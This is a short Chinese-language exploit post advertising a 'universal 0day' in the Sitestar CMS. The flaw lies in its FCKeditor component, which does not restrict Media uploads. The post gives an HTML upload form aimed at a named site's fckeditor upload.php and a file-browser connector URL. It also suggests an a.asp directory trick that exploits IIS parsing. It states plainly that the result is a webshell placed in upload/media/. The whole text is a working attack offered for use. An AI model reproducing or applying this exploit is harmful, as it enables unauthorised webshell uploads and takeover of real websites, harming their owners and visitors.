sitestar最新通杀0day

和Fckeditor 2.4.2 漏洞一样。没有对media进行限制。

 

要是服务器基于WINDOWS，还可以建一个a.asp的目录。然后利用IIS解析漏洞上传随意可以上传的伪装后门。

 

IIS解析利用代码：admin/fckeditor/browser/browser.html?Type=Image&Connector=connector.php

 

fckeditor利用代码 ：

 

<form id="frmUpload" enctype="multipart/form-data" action="http://www.iick.blog/admin/fckeditor/upload/upload.php?Type=Media" method="post">

Upload a new file:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>

 

把上面代码保存成tmdsb.html。上传后webshell在upload/media/目录下面